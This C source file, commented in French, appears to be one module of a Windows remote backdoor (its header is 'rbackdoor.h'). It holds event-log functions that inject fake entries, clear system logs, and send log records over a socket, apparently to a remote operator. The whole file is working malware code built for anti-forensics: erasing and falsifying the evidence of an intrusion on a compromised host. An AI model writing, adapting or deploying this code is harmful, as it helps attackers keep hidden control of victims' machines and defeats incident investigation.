#include "rbackdoor.h"

/************************************************************************/
/*      Fonction permettant d'ajouter une entre dans l'eventlog       */
/************************************************************************/

int Add_Event(const char *host, char *source)
{
	HANDLE h;
	LPSTR aszMsg[] = { source, };
	
	if(!*host || !*source) {
		Proc_help("addevent");
		return -1;
	}
	
	h = RegisterEventSource(host,  source);
	if (h == NULL) {
		DisplayMessage("Could not register event source.", 0);
		return -1;
	}
	
	if (!ReportEvent(h,EVENTLOG_INFORMATION_TYPE,1,0x1003,NULL,0, 0,(LPTSTR *) aszMsg, NULL)) {
		DisplayMessage("Could not report event.", 0);
		return -1;
	}
	DisplayMessage("Event ajoute avec succes.", 1);
	DeregisterEventSource(h);
	
	return 0;
}

/************************************************************************/
/*      Fonction permettant d'effacer les journaux  de l'eventlog       */
/************************************************************************/


int Clear_Log(const char *host, const char *type)
{
	HANDLE h;
	
	if(!*host || !*type)	{
		Proc_help("clearlog");
		return -1;
	}
	
	h = RegisterEventSource(host,  type);
	if (h == NULL) {
		DisplayMessage("Could not register event source.", 0);
		return -1;
	}
	
	if(ClearEventLog(h,NULL)==0) {
		DisplayMessage("Error: Erreur lors de la tentative d'effacement des journaux systeme.", 0);
		return -1;
	}
	DisplayMessage("Journal Systeme efface avec succes.", 1);

	return 0;
}


/************************************************************************/
/*      Fonction permettant de lister les evenements de l'eventlog      */
/************************************************************************/

int ListEvent(const char *host, const char *type)
{
	HANDLE h;
	EVENTLOGRECORD *pevlr;
	BYTE bBuffer[1024];
	DWORD dwRead, dwNeeded, dwThisRecord;
	char *buffer=NULL;
	
	dwThisRecord = 0;

	buffer = (char *)GlobalAlloc(GPTR, 1024);
	CheckMemory(buffer);

	if(!*host || !*type) {
		Proc_help("listevent");
		return -1;
	}
	
	h = OpenEventLog(host, type);
	if (h == NULL) {
		DisplayMessage("Could not register event source.", 0);
		GlobalFree(buffer);
		return -1;
	}

	pevlr = (EVENTLOGRECORD *)&bBuffer;
	
	while (ReadEventLog(h,EVENTLOG_FORWARDS_READ | EVENTLOG_SEQUENTIAL_READ,0,pevlr,1024,&dwRead,&dwNeeded)) {
		while (dwRead > 0) {
			sprintf(buffer, " > %02d  Event ID: 0x%08X ", dwThisRecord++, pevlr->EventID);
			rsend(ConnectSocket, buffer);
			sprintf(buffer, "EventType: %d Source: %s\n", pevlr->EventType, (LPSTR) ((LPBYTE) pevlr + sizeof(EVENTLOGRECORD)));
			rsend(ConnectSocket, buffer);
			dwRead -= pevlr->Length;
			pevlr = (EVENTLOGRECORD *) ((LPBYTE) pevlr + pevlr->Length);
		}
		pevlr = (EVENTLOGRECORD *)&bBuffer;
	}
	CloseEventLog(h);
	GlobalFree(buffer);

	return 0;
}

